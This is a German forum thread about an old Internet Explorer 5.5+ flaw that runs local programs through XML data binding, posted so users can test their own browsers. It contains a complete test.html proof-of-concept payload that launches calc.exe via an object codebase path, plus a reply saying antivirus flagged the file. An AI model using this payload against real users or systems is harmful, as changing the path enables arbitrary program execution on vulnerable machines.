Jump to content

IE Exploit


Lian
Der letzte Beitrag zu diesem Thema ist mehr als 180 Tage alt. Bitte erstelle einen neuen Beitrag zu Deiner Anfrage!

Empfohlene Beiträge

Hallo allerseits,

 

seit längerem ist ein exploit für den Internet Explorer ab der Version 5.5 bekannt.

 

Seit kurzem kann dieser exploit auch ohne Active Scripting oder ActiveX ausgeführt werden:

http://heise.de/newsticker/data/pab-04.03.02-001/

 

Ist nicht ganz ohne, probiert dringend mal den Browsercheck aus:

 

http://www.heise.de/ct/browsercheck/e5demo10.shtml

 

 

Um das ganze lokal zu testen kopiert einfach folgenden text in einen Datei test.html:

 

 

<HTML>
<head><title>none</title></head>
<body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
   <security>
       <exploit>
           <![CDATA[
           <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
           ]]>
       </exploit>
   </security>
</xml>
</body> 
</HTML>

 

 

Einzig der Pfad in codebase zu c:/winnt/system32/calc.exe muss stimmen.

 

Falls der Taschenrechner hochkommt, ist das ... nicht gut ;)

 

Weil die Sicherheitslücke unabhängig von den Einstellungen die Interpretation von HTML-Seiten betrifft, sind auch Outlook und Outlook Express mit hohen Sicherheitseinstellungen von dem Problem betroffen. Eine einfache HTML-Mail kann somit beim Öffnen oder in der Vorschau ein Programm starten. Von Microsoft gibt es bislang noch keine Stellungnahme oder einen Patch. (pab/c't)

Link zu diesem Kommentar
  • 1 Monat später...
  • 1 Monat später...
  • 1 Monat später...
  • 5 Monate später...

Ich weiss leider nicht wie es sonst hier gehandhabt wird, deshalb einfach mal das was bei mir beim ausprobieren mit dem "Html-code" passiert ist.

Ich hab nen WinXP Pro. rechner mit IE 6 und SP1 für den IE, was aber nicht hilft soweit ich weiss... ;-)

 

Aber Norten AV 2003 mit neuester Virensignatur von vor 3 Tagen, hat sofort angeschlagen, als ich diese Datei nur Speicherrn wollte!!!

 

Gruß helpless

Link zu diesem Kommentar
Der letzte Beitrag zu diesem Thema ist mehr als 180 Tage alt. Bitte erstelle einen neuen Beitrag zu Deiner Anfrage!

Schreibe einen Kommentar

Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.

Gast
Auf dieses Thema antworten...

×   Du hast formatierten Text eingefügt.   Formatierung jetzt entfernen

  Only 75 emoji are allowed.

×   Dein Link wurde automatisch eingebettet.   Einbetten rückgängig machen und als Link darstellen

×   Dein vorheriger Inhalt wurde wiederhergestellt.   Editor-Fenster leeren

×   Du kannst Bilder nicht direkt einfügen. Lade Bilder hoch oder lade sie von einer URL.

×
×
  • Neu erstellen...